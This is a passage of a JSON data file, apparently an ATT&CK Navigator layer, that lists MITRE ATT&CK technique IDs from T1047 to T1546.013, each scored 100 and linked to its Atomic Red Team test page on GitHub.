Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View 